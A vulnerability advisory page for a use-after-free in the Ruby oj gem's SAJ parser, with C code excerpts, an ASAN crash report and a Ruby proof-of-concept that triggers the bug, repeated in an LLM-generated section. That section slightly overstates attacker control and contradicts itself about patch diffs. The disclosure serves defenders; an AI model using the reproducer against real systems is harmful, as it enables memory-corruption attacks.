VYPR
← All advisories
High severity8.7NVD Advisory· Published Jun 19, 2026· Updated Jun 19, 2026

Oj: Use-After-Free in Oj::Parser SAJ Callback via Input Mutation

CVE-2026-54898

Description

Summary

Oj::Parser#parse is vulnerable to a heap use-after-free when a SAJ/SAJ2 callback mutates the input JSON string during parsing. The C engine holds a raw const byte * pointer into the Ruby string's internal buffer. If a callback (e.g. hash_start) resizes the string — for example by calling String#replace with a longer value — Ruby reallocates the string buffer and frees the old one. The C parser's pointer is left dangling; the next character read at parser.c:607 is a use-after-free.

Version

  • Software: oj gem
  • Affected: all versions with ext/oj/parser.c
  • Latest tested: 3.17.1 (confirmed present)

Details

ext/oj/parser.c, parser_parseparse:

static VALUE parser_parse(VALUE self, VALUE json) {
    const byte *ptr = (const byte *)StringValuePtr(json);  // raw pointer into Ruby string
    // ...
    parse(p, ptr);   // ptr used throughout; any realloc frees the backing buffer
}

// parser.c:607
static void parse(ojParser p, const byte *json) {
    const byte *b = json;
    // ...
    for (; '\0' != *b; b++) {   // ← UAF: reads freed memory after callback resizes json

Ruby's String#replace (or <<, gsub!, etc.) can trigger a reallocation of the string's internal buffer if the new content is larger than the embedded capacity, freeing the old buffer that ptr still points to.

ASAN report: `` ==372273==ERROR: AddressSanitizer: heap-use-after-free on address 0x51900008ed81 READ of size 1 at 0x51900008ed81 thread T0 #0 parse /ext/oj/parser.c:607 #1 parser_parse /ext/oj/parser.c:1408 0x51900008ed81 is located 1 bytes inside of 1023-byte region [0x51900008ed80, 0x51900008f17f) freed by thread T0 here: #0 free #1 ruby_sized_xfree (libruby-3.3.so.3.3) Shadow bytes: [fd]fd fd fd fd fd ... (entire region freed) ``

Reproduce

require 'oj'

class Mutator
  def initialize(json) = (@json = json; @done = false)

  def hash_start(key)
    return if @done; @done = true
    @json.replace('x' * 1_000_000)   # triggers String realloc, frees original buffer
  end

  def hash_end(key); end
  def array_start(key); end
  def array_end(key); end
  def add_value(value, key); end
end

json = '{"a":1,"pad":"' + ('A' * 1000) + '","z":2}'
parser = Oj::Parser.new(:saj)
parser.handler = Mutator.new(json)
parser.parse(json)

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1
  • Oj/oj gemllm-create
    Range: all versions with ext/oj/parser.c

Patches

Vulnerability mechanics

Root cause

"The C parser holds a raw pointer into the Ruby string's internal buffer; when a SAJ/SAJ2 callback resizes the string, Ruby reallocates the buffer and frees the old one, leaving the pointer dangling."

Attack vector

An attacker who can control the JSON input passed to `Oj::Parser#parse` with a SAJ/SAJ2 handler can trigger a heap use-after-free. The C engine stores a raw `const byte *` pointer into the Ruby string's internal buffer. If a callback such as `hash_start` resizes the string (e.g. via `String#replace` with a longer value), Ruby reallocates the buffer and frees the old one, leaving the C parser's pointer dangling. The next character read at `parser.c:607` then reads freed heap memory [ref_id=1][ref_id=2].

What the fix does

The advisory does not include a patch diff. The recommended fix would require the C parser to either pin the Ruby string's buffer (preventing reallocation during parsing) or to re-fetch the pointer after every callback invocation. Without a published patch, users must avoid mutating the input JSON string inside SAJ/SAJ2 callbacks [ref_id=1][ref_id=2].

Preconditions

  • configThe application must use Oj::Parser with a SAJ or SAJ2 handler that mutates the input JSON string during a callback (e.g. hash_start).
  • inputThe attacker must be able to supply a JSON string that is parsed by the vulnerable parser.

Reproduction

```ruby require 'oj'

class Mutator def initialize(json) = (@json = json; @done = false)

def hash_start(key) return if @done; @done = true @json.replace('x' * 1_000_000) # triggers String realloc, frees original buffer end

def hash_end(key); end def array_start(key); end def array_end(key); end def add_value(value, key); end end

json = '{"a":1,"pad":"' + ('A' * 1000) + '","z":2}' parser = Oj::Parser.new(:saj) parser.handler = Mutator.new(json) parser.parse(json) ```

Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.